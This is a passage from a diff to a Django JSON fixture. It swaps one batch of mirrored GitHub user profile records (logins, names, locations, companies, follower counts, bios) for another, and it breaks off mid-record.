+695652,49 @@ }, { "model": "github.user", - "pk": 3014, + "pk": 8390, "fields": { - "nest_created_at": "2024-09-12T03:08:49.208Z", - "nest_updated_at": "2024-09-12T03:08:49.208Z", - "name": "Ehis Edemakhiota", - "login": "ehizman", - "email": "edemaehiz@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/23247186?v=4", - "company": "", - "location": "Lagos, Nigeria", + "nest_created_at": "2024-09-22T10:38:41.416Z", + "nest_updated_at": "2024-09-22T20:23:55.924Z", + "name": "Peter Potrowl", + "login": "peter17", + "email": "peter.potrowl@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/752832?v=4", + "company": "Freelancer", + "location": "France", "collaborators_count": 0, - "following_count": 35, - "followers_count": 81, - "public_gists_count": 13, - "public_repositories_count": 114, - "created_at": "2016-11-03T21:10:23Z", - "updated_at": "2024-08-08T11:35:49Z", - "node_id": "MDQ6VXNlcjIzMjQ3MTg2", - "bio": "I write software @semicolon-africa, also contribute to FOSS and write technical tutorials in my spare time. Java programmer at heart.\r\n", - "is_hireable": true, - "twitter_username": "ehizman_tutorEd" + "following_count": 5, + "followers_count": 10, + "public_gists_count": 2, + "public_repositories_count": 30, + "created_at": "2011-04-26T16:31:41Z", + "updated_at": "2024-09-13T13:13:10Z", + "node_id": "MDQ6VXNlcjc1MjgzMg==", + "bio": "", + "is_hireable": false, + "twitter_username": "PeterPotrowl" } }, { "model": "github.user", - "pk": 3015, + "pk": 8391, "fields": { - "nest_created_at": "2024-09-12T03:09:17.748Z", - "nest_updated_at": "2024-09-12T03:09:17.748Z", - "name": "", - "login": "tkomlodi", + "nest_created_at": "2024-09-22T10:38:41.726Z", + "nest_updated_at": "2024-09-22T20:23:56.244Z", + "name": "ladybug", + "login": "juliadotter", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6026319?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/163227?v=4", "company": "", - "location": "", + "location": "Sydney, Australia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2013-11-24T23:33:35Z", - "updated_at": "2024-06-21T14:34:23Z", - "node_id": "MDQ6VXNlcjYwMjYzMTk=", + "public_repositories_count": 4, + "created_at": "2009-12-06T07:05:46Z", + "updated_at": "2021-04-24T05:39:14Z", + "node_id": "MDQ6VXNlcjE2MzIyNw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435628,24 +695702,49 @@ }, { "model": "github.user", - "pk": 3016, + "pk": 8392, "fields": { - "nest_created_at": "2024-09-12T03:09:19.854Z", - "nest_updated_at": "2024-09-12T03:09:19.854Z", - "name": "", - "login": "massot-c", + "nest_created_at": "2024-09-22T10:38:42.044Z", + "nest_updated_at": "2024-09-22T20:23:56.587Z", + "name": "Michal Smolík", + "login": "Zygro", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51371714?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9499194?v=4", "company": "", + "location": "Slovakia", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2014-11-01T15:09:18Z", + "updated_at": "2024-07-24T08:57:42Z", + "node_id": "MDQ6VXNlcjk0OTkxOTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8393, + "fields": { + "nest_created_at": "2024-09-22T10:38:42.692Z", + "nest_updated_at": "2024-09-22T20:23:57.338Z", + "name": "Ali ", + "login": "aloney", + "email": "aloney@sonatype.com", + "avatar_url": "https://avatars.githubusercontent.com/u/573519?v=4", + "company": "Sonatype", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2019-06-04T13:31:20Z", - "updated_at": "2024-02-08T10:41:00Z", - "node_id": "MDQ6VXNlcjUxMzcxNzE0", + "created_at": "2011-01-19T22:36:31Z", + "updated_at": "2016-02-26T23:47:44Z", + "node_id": "MDQ6VXNlcjU3MzUxOQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435653,14 +695752,14 @@ }, { "model": "github.user", - "pk": 3017, + "pk": 8394, "fields": { - "nest_created_at": "2024-09-12T03:09:28.183Z", - "nest_updated_at": "2024-09-12T03:09:28.183Z", + "nest_created_at": "2024-09-22T10:38:43.039Z", + "nest_updated_at": "2024-09-22T20:23:57.651Z", "name": "", - "login": "richard66033", + "login": "thegoodcrumpets", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/104577745?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/30388658?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -435668,9 +695767,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 2, - "created_at": "2022-04-28T14:23:27Z", - "updated_at": "2023-11-13T14:34:57Z", - "node_id": "U_kgDOBju60Q", + "created_at": "2017-07-23T14:04:28Z", + "updated_at": "2024-06-21T20:01:33Z", + "node_id": "MDQ6VXNlcjMwMzg4NjU4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435678,24 +695777,49 @@ }, { "model": "github.user", - "pk": 3018, + "pk": 8395, "fields": { - "nest_created_at": "2024-09-12T03:09:34.959Z", - "nest_updated_at": "2024-09-12T03:09:34.959Z", - "name": "", - "login": "13Anthony", + "nest_created_at": "2024-09-22T10:38:43.359Z", + "nest_updated_at": "2024-09-22T20:29:38.106Z", + "name": "xavier", + "login": "xanderhades", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/147270663?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/18427998?v=4", "company": "", "location": "", "collaborators_count": 0, + "following_count": 8, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-04-12T19:24:59Z", + "updated_at": "2024-09-15T13:08:03Z", + "node_id": "MDQ6VXNlcjE4NDI3OTk4", + "bio": "\\x48\\x65\\x6c\\x6c\\x6f\\x2c\\x20\\x57\\x6f\\x72\\x6c\\x64\\x21\\x0d\\x0a", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8396, + "fields": { + "nest_created_at": "2024-09-22T10:38:43.665Z", + "nest_updated_at": "2024-09-22T20:23:58.282Z", + "name": "Hillstone Networks Interns (Beijing Office)", + "login": "hillstonenet-interns-bj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25835359?v=4", + "company": "", + "location": "Beijng", + "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2023-10-07T17:16:45Z", - "updated_at": "2024-05-30T11:20:11Z", - "node_id": "U_kgDOCMcsBw", + "public_repositories_count": 3, + "created_at": "2017-02-17T03:14:07Z", + "updated_at": "2017-02-20T03:12:11Z", + "node_id": "MDQ6VXNlcjI1ODM1MzU5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435703,24 +695827,24 @@ }, { "model": "github.user", - "pk": 3019, + "pk": 8397, "fields": { - "nest_created_at": "2024-09-12T03:09:39.706Z", - "nest_updated_at": "2024-09-12T03:09:39.706Z", + "nest_created_at": "2024-09-22T10:38:43.980Z", + "nest_updated_at": "2024-09-22T20:23:58.594Z", "name": "", - "login": "SeheX", + "login": "dmayhew", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/147345361?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2823236?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-10-08T19:50:47Z", - "updated_at": "2023-12-17T14:02:03Z", - "node_id": "U_kgDOCMhP0Q", + "public_repositories_count": 6, + "created_at": "2012-11-17T20:11:48Z", + "updated_at": "2021-11-09T20:29:46Z", + "node_id": "MDQ6VXNlcjI4MjMyMzY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435728,24 +695852,24 @@ }, { "model": "github.user", - "pk": 3020, + "pk": 8398, "fields": { - "nest_created_at": "2024-09-12T03:09:46.009Z", - "nest_updated_at": "2024-09-18T19:02:07.474Z", + "nest_created_at": "2024-09-22T10:38:44.311Z", + "nest_updated_at": "2024-09-22T20:23:58.901Z", "name": "", - "login": "kamini-saini", + "login": "cap-dev0x", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31923365?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/158111888?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-09-13T11:22:39Z", - "updated_at": "2024-09-04T14:22:04Z", - "node_id": "MDQ6VXNlcjMxOTIzMzY1", + "public_repositories_count": 4, + "created_at": "2024-01-29T23:22:30Z", + "updated_at": "2024-08-05T18:11:08Z", + "node_id": "U_kgDOCWyYkA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435753,99 +695877,124 @@ }, { "model": "github.user", - "pk": 3021, + "pk": 8399, "fields": { - "nest_created_at": "2024-09-12T03:10:07.698Z", - "nest_updated_at": "2024-09-12T03:10:07.698Z", - "name": "Leiber Bertel", - "login": "leiberbertel", + "nest_created_at": "2024-09-22T10:38:44.623Z", + "nest_updated_at": "2024-09-22T20:23:59.212Z", + "name": "Sönke", + "login": "eknoes", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/108705437?v=4", - "company": "Quipux", - "location": "Medellín, Colombia", + "avatar_url": "https://avatars.githubusercontent.com/u/3641205?v=4", + "company": "", + "location": "Göttingen, Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 5, + "following_count": 64, + "followers_count": 42, "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2022-07-05T01:28:16Z", - "updated_at": "2024-08-10T16:09:26Z", - "node_id": "U_kgDOBnq2nQ", - "bio": "𝑭𝒖𝒍𝒍 𝒔𝒕𝒂𝒄𝒌 𝒅𝒆𝒗𝒆𝒍𝒐𝒑𝒆𝒓", - "is_hireable": false, - "twitter_username": "BertelLeiber" + "public_repositories_count": 50, + "created_at": "2013-02-19T21:42:32Z", + "updated_at": "2024-09-13T09:35:26Z", + "node_id": "MDQ6VXNlcjM2NDEyMDU=", + "bio": "PhD student @ University of Göttingen, Germany", + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 3022, + "pk": 8400, "fields": { - "nest_created_at": "2024-09-12T03:10:11.845Z", - "nest_updated_at": "2024-09-12T03:10:11.845Z", + "nest_created_at": "2024-09-22T10:38:44.932Z", + "nest_updated_at": "2024-09-22T20:23:59.522Z", "name": "", - "login": "SelectBillyFromC", + "login": "SylvainJuge", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/61947286?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/763082?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 13, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2020-03-08T18:55:11Z", - "updated_at": "2023-10-11T02:36:47Z", - "node_id": "MDQ6VXNlcjYxOTQ3Mjg2", - "bio": "BU varsity coder | \r\n\r\nI like music 🎹 and building 🏗️ things! | \r\nSELECT me 💯", + "following_count": 11, + "followers_count": 27, + "public_gists_count": 7, + "public_repositories_count": 62, + "created_at": "2011-05-02T09:02:07Z", + "updated_at": "2024-07-31T14:41:59Z", + "node_id": "MDQ6VXNlcjc2MzA4Mg==", + "bio": "", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3023, + "pk": 8401, "fields": { - "nest_created_at": "2024-09-12T03:10:21.453Z", - "nest_updated_at": "2024-09-12T03:10:21.453Z", - "name": "Vaibhav Shah", - "login": "vaibhav0k", + "nest_created_at": "2024-09-22T10:38:45.249Z", + "nest_updated_at": "2024-09-22T20:23:59.870Z", + "name": "Nitish", + "login": "kumar-nitish", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72647248?v=4", - "company": "Bajaj Finserv", - "location": "Pune", + "avatar_url": "https://avatars.githubusercontent.com/u/3117614?v=4", + "company": "", + "location": "India", "collaborators_count": 0, - "following_count": 3, - "followers_count": 9, - "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2020-10-10T08:00:40Z", - "updated_at": "2024-04-25T04:33:33Z", - "node_id": "MDQ6VXNlcjcyNjQ3MjQ4", - "bio": "CSE undergrad at VIT Vellore | VIT'24", + "following_count": 10, + "followers_count": 10, + "public_gists_count": 2, + "public_repositories_count": 32, + "created_at": "2012-12-24T19:49:59Z", + "updated_at": "2024-09-05T11:27:11Z", + "node_id": "MDQ6VXNlcjMxMTc2MTQ=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3024, + "pk": 8402, "fields": { - "nest_created_at": "2024-09-12T03:10:22.332Z", - "nest_updated_at": "2024-09-12T03:10:22.332Z", - "name": "", - "login": "bperry-mf", + "nest_created_at": "2024-09-22T10:38:45.557Z", + "nest_updated_at": "2024-09-22T20:24:00.184Z", + "name": "Manfred Moser", + "login": "mosabua", + "email": "manfred@simpligility.ca", + "avatar_url": "https://avatars.githubusercontent.com/u/145658?v=4", + "company": "simpligility technologies inc.", + "location": "Victoria, BC, Canada", + "collaborators_count": 0, + "following_count": 32, + "followers_count": 1258, + "public_gists_count": 11, + "public_repositories_count": 36, + "created_at": "2009-10-28T06:18:58Z", + "updated_at": "2024-06-18T15:54:46Z", + "node_id": "MDQ6VXNlcjE0NTY1OA==", + "bio": "Write code and documentation - then teach! Foster collaboration and build open source communities.", + "is_hireable": false, + "twitter_username": "simpligility" + } +}, +{ + "model": "github.user", + "pk": 8403, + "fields": { + "nest_created_at": "2024-09-22T10:38:45.869Z", + "nest_updated_at": "2024-09-22T20:24:00.535Z", + "name": "Gary", + "login": "maduck", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/90418293?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1357292?v=4", + "company": "@Garyatrics ", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-09-09T19:14:51Z", - "updated_at": "2023-08-08T00:35:04Z", - "node_id": "MDQ6VXNlcjkwNDE4Mjkz", + "following_count": 2, + "followers_count": 12, + "public_gists_count": 4, + "public_repositories_count": 14, + "created_at": "2012-01-20T08:47:26Z", + "updated_at": "2024-09-12T16:12:03Z", + "node_id": "MDQ6VXNlcjEzNTcyOTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435853,99 +696002,124 @@ }, { "model": "github.user", - "pk": 3025, + "pk": 8404, "fields": { - "nest_created_at": "2024-09-12T03:10:37.863Z", - "nest_updated_at": "2024-09-18T19:04:38.196Z", - "name": "OSHP", - "login": "oshp", + "nest_created_at": "2024-09-22T10:38:46.539Z", + "nest_updated_at": "2024-09-22T20:24:01.160Z", + "name": "Jose Selvi", + "login": "jselvi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/21014071?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/773518?v=4", + "company": "Pentester.Es", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 48, + "following_count": 1, + "followers_count": 100, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2016-08-13T21:56:03Z", - "updated_at": "2024-08-26T11:35:10Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjIxMDE0MDcx", - "bio": "OWASP Secure Headers Project", + "public_repositories_count": 32, + "created_at": "2011-05-07T07:23:13Z", + "updated_at": "2024-05-25T18:37:46Z", + "node_id": "MDQ6VXNlcjc3MzUxOA==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3026, + "pk": 8405, "fields": { - "nest_created_at": "2024-09-12T03:11:18.740Z", - "nest_updated_at": "2024-09-18T19:11:34.000Z", - "name": "Gustavo Arreaza", - "login": "VascoArreaza", - "email": "gustavoskrill@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/9584736?v=4", - "company": "Owasp", - "location": "Chile", + "nest_created_at": "2024-09-22T10:38:46.846Z", + "nest_updated_at": "2024-09-22T20:24:01.473Z", + "name": "Ilguiz [eel ghEEz] Latypov", + "login": "ilatypov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30419?v=4", + "company": "", + "location": "Warterloo, Ontario, Canada", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2014-11-06T04:21:32Z", - "updated_at": "2024-09-03T11:31:40Z", - "node_id": "MDQ6VXNlcjk1ODQ3MzY=", + "following_count": 7, + "followers_count": 5, + "public_gists_count": 20, + "public_repositories_count": 47, + "created_at": "2008-10-22T16:38:39Z", + "updated_at": "2024-09-20T11:22:22Z", + "node_id": "MDQ6VXNlcjMwNDE5", "bio": "", "is_hireable": true, - "twitter_username": "" + "twitter_username": "ilgiz" } }, { "model": "github.user", - "pk": 3027, + "pk": 8406, "fields": { - "nest_created_at": "2024-09-12T03:11:27.138Z", - "nest_updated_at": "2024-09-18T19:13:18.424Z", - "name": "Izar Tarandach", - "login": "izar", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/368769?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:38:47.161Z", + "nest_updated_at": "2024-09-22T20:24:01.789Z", + "name": "Gerard de Leeuw", + "login": "lion7", + "email": "gdeleeuw@leeuwit.nl", + "avatar_url": "https://avatars.githubusercontent.com/u/5264897?v=4", + "company": "Myst", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 6, - "followers_count": 74, + "following_count": 16, + "followers_count": 9, "public_gists_count": 2, - "public_repositories_count": 22, - "created_at": "2010-08-18T18:18:33Z", - "updated_at": "2024-09-10T21:09:07Z", - "node_id": "MDQ6VXNlcjM2ODc2OQ==", - "bio": "Just that guy.", + "public_repositories_count": 86, + "created_at": "2013-08-19T21:12:14Z", + "updated_at": "2024-09-21T08:23:41Z", + "node_id": "MDQ6VXNlcjUyNjQ4OTc=", + "bio": "My biggest passion in life is writing software and I enjoy solving complex problems.", + "is_hireable": false, + "twitter_username": "gerarddeleeuw" + } +}, +{ + "model": "github.user", + "pk": 8407, + "fields": { + "nest_created_at": "2024-09-22T10:38:47.789Z", + "nest_updated_at": "2024-09-22T20:24:02.445Z", + "name": "András Veres-Szentkirályi", + "login": "dnet", + "email": "vsza@vsza.hu", + "avatar_url": "https://avatars.githubusercontent.com/u/163115?v=4", + "company": "@silentsignal", + "location": "Budapest", + "collaborators_count": 0, + "following_count": 264, + "followers_count": 298, + "public_gists_count": 24, + "public_repositories_count": 200, + "created_at": "2009-12-05T22:20:40Z", + "updated_at": "2024-07-16T14:48:21Z", + "node_id": "MDQ6VXNlcjE2MzExNQ==", + "bio": "co-founder of @silentsignal and @hsbp", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3028, + "pk": 8408, "fields": { - "nest_created_at": "2024-09-12T03:11:30.418Z", - "nest_updated_at": "2024-09-12T03:11:55.381Z", - "name": "", - "login": "colesmj", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39390458?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:38:48.098Z", + "nest_updated_at": "2024-09-22T20:24:02.803Z", + "name": "Aravind Chintalapalli", + "login": "aravindc26", + "email": "aravindc26@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1547801?v=4", + "company": ".", + "location": "Chennai", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-05-17T23:27:50Z", - "updated_at": "2023-06-25T14:01:45Z", - "node_id": "MDQ6VXNlcjM5MzkwNDU4", + "following_count": 55, + "followers_count": 11, + "public_gists_count": 6, + "public_repositories_count": 17, + "created_at": "2012-03-17T17:31:23Z", + "updated_at": "2024-05-24T09:48:11Z", + "node_id": "MDQ6VXNlcjE1NDc4MDE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435953,49 +696127,49 @@ }, { "model": "github.user", - "pk": 3029, + "pk": 8409, "fields": { - "nest_created_at": "2024-09-12T03:11:32.052Z", - "nest_updated_at": "2024-09-12T03:11:54.194Z", - "name": "", - "login": "nozmore", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12926168?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:38:48.409Z", + "nest_updated_at": "2024-09-22T20:24:03.128Z", + "name": "Araj P Raju", + "login": "arajparaj", + "email": "arajparaj@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3478044?v=4", + "company": "Tavant", + "location": "Bengaluru", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 3, - "public_repositories_count": 0, - "created_at": "2015-06-16T20:29:51Z", - "updated_at": "2024-07-15T15:14:21Z", - "node_id": "MDQ6VXNlcjEyOTI2MTY4", + "following_count": 39, + "followers_count": 19, + "public_gists_count": 2, + "public_repositories_count": 20, + "created_at": "2013-02-05T04:05:45Z", + "updated_at": "2020-02-17T11:51:40Z", + "node_id": "MDQ6VXNlcjM0NzgwNDQ=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3030, + "pk": 8410, "fields": { - "nest_created_at": "2024-09-12T03:11:52.508Z", - "nest_updated_at": "2024-09-12T03:11:52.508Z", - "name": "Mike Jarrett", - "login": "mikejarrett", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1672173?v=4", - "company": "", - "location": "London, UK", + "nest_created_at": "2024-09-22T10:38:48.763Z", + "nest_updated_at": "2024-09-22T20:24:03.433Z", + "name": "Vandeputte Brice", + "login": "boly38", + "email": "brice.vandeputte@orange.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3100576?v=4", + "company": "Orange-Application-for-Business", + "location": "Grenoble, France", "collaborators_count": 0, - "following_count": 5, - "followers_count": 13, - "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2012-04-23T20:06:27Z", - "updated_at": "2024-08-20T12:00:05Z", - "node_id": "MDQ6VXNlcjE2NzIxNzM=", + "following_count": 25, + "followers_count": 15, + "public_gists_count": 20, + "public_repositories_count": 97, + "created_at": "2012-12-21T19:33:44Z", + "updated_at": "2024-09-20T11:28:17Z", + "node_id": "MDQ6VXNlcjMxMDA1NzY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436003,99 +696177,99 @@ }, { "model": "github.user", - "pk": 3031, + "pk": 8411, "fields": { - "nest_created_at": "2024-09-12T03:11:56.571Z", - "nest_updated_at": "2024-09-12T03:11:57.360Z", - "name": "Per Østergaard", - "login": "per-oestergaard", + "nest_created_at": "2024-09-22T10:38:49.116Z", + "nest_updated_at": "2024-09-22T20:24:03.777Z", + "name": "Toshi", + "login": "toshihue", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6398503?v=4", - "company": "@LEGO ", - "location": "Billund, Denmark", + "avatar_url": "https://avatars.githubusercontent.com/u/34364637?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 7, + "following_count": 2, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 22, - "created_at": "2014-01-14T10:44:07Z", - "updated_at": "2024-09-04T19:39:45Z", - "node_id": "MDQ6VXNlcjYzOTg1MDM=", - "bio": "Principal Engineer, Digital Security", + "public_repositories_count": 2, + "created_at": "2017-12-08T06:33:31Z", + "updated_at": "2024-02-16T01:38:03Z", + "node_id": "MDQ6VXNlcjM0MzY0NjM3", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3032, + "pk": 8412, "fields": { - "nest_created_at": "2024-09-12T03:11:58.219Z", - "nest_updated_at": "2024-09-12T03:11:58.219Z", + "nest_created_at": "2024-09-22T10:38:49.424Z", + "nest_updated_at": "2024-09-22T20:24:04.087Z", "name": "", - "login": "jharnois4512", + "login": "TimDG", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36828732?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1313186?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2018-02-26T00:32:30Z", - "updated_at": "2024-08-24T17:27:49Z", - "node_id": "MDQ6VXNlcjM2ODI4NzMy", - "bio": "Computer Science/Psychology major\r\nCyber Security Concentration ", + "following_count": 1, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2012-01-08T16:25:41Z", + "updated_at": "2024-08-25T17:18:18Z", + "node_id": "MDQ6VXNlcjEzMTMxODY=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3033, + "pk": 8413, "fields": { - "nest_created_at": "2024-09-12T03:11:59.056Z", - "nest_updated_at": "2024-09-12T03:11:59.056Z", - "name": "Jon Renshaw", - "login": "jmrenshaw", + "nest_created_at": "2024-09-22T10:38:49.731Z", + "nest_updated_at": "2024-09-22T20:24:04.396Z", + "name": "Tiago Mussi", + "login": "tmussi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23117233?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5429258?v=4", "company": "", - "location": "", + "location": "Luxembourg", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, + "following_count": 2, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2016-10-28T08:53:38Z", - "updated_at": "2024-09-06T10:03:39Z", - "node_id": "MDQ6VXNlcjIzMTE3MjMz", - "bio": "Cyber security and network engineering research.\r\nDirector of cyber security research services for NCC Group", + "public_repositories_count": 12, + "created_at": "2013-09-10T17:19:53Z", + "updated_at": "2023-08-08T09:04:18Z", + "node_id": "MDQ6VXNlcjU0MjkyNTg=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3034, + "pk": 8414, "fields": { - "nest_created_at": "2024-09-12T03:11:59.858Z", - "nest_updated_at": "2024-09-12T03:12:00.664Z", + "nest_created_at": "2024-09-22T10:38:50.058Z", + "nest_updated_at": "2024-09-22T20:24:04.774Z", "name": "", - "login": "amrmp", + "login": "ThomasBlt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37609110?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/28574442?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 2, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-03-21T05:10:22Z", - "updated_at": "2024-08-28T00:38:03Z", - "node_id": "MDQ6VXNlcjM3NjA5MTEw", + "public_repositories_count": 10, + "created_at": "2017-05-09T18:39:12Z", + "updated_at": "2024-08-21T11:47:43Z", + "node_id": "MDQ6VXNlcjI4NTc0NDQy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436103,49 +696277,99 @@ }, { "model": "github.user", - "pk": 3035, + "pk": 8415, "fields": { - "nest_created_at": "2024-09-12T03:12:01.483Z", - "nest_updated_at": "2024-09-12T03:12:01.483Z", - "name": "黄承开", - "login": "highkay", - "email": "highkay@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/443490?v=4", - "company": "@afc-falcon", - "location": "Shanghai.China", + "nest_created_at": "2024-09-22T10:38:50.690Z", + "nest_updated_at": "2024-09-22T20:24:05.406Z", + "name": "Ryan Thomas", + "login": "Ryan-Thomas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12455301?v=4", + "company": "", + "location": "Seattle, Washington", "collaborators_count": 0, - "following_count": 10, - "followers_count": 59, - "public_gists_count": 0, - "public_repositories_count": 74, - "created_at": "2010-10-18T05:41:27Z", - "updated_at": "2024-08-22T02:02:09Z", - "node_id": "MDQ6VXNlcjQ0MzQ5MA==", - "bio": "Fullstack crafter.", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 39, + "created_at": "2015-05-15T04:50:36Z", + "updated_at": "2023-11-20T22:39:27Z", + "node_id": "MDQ6VXNlcjEyNDU1MzAx", + "bio": "", "is_hireable": false, - "twitter_username": "highkay" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3036, + "pk": 8416, "fields": { - "nest_created_at": "2024-09-12T03:12:03.530Z", - "nest_updated_at": "2024-09-12T03:12:03.530Z", - "name": "", - "login": "ccc17as", + "nest_created_at": "2024-09-22T10:38:51.023Z", + "nest_updated_at": "2024-09-22T20:24:05.716Z", + "name": "Ryan Canty", + "login": "onetwopunch", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/82218705?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1054518?v=4", + "company": "Google", + "location": "San Clemente", + "collaborators_count": 0, + "following_count": 40, + "followers_count": 80, + "public_gists_count": 10, + "public_repositories_count": 97, + "created_at": "2011-09-15T22:27:17Z", + "updated_at": "2024-08-21T23:20:50Z", + "node_id": "MDQ6VXNlcjEwNTQ1MTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "on3tw0punch" + } +}, +{ + "model": "github.user", + "pk": 8417, + "fields": { + "nest_created_at": "2024-09-22T10:38:51.334Z", + "nest_updated_at": "2024-09-22T20:24:06.026Z", + "name": "Ruslan Boyarskiy", + "login": "rusboy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3583960?v=4", + "company": "Positive Technology", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-04-09T12:45:35Z", - "updated_at": "2023-12-14T20:09:02Z", - 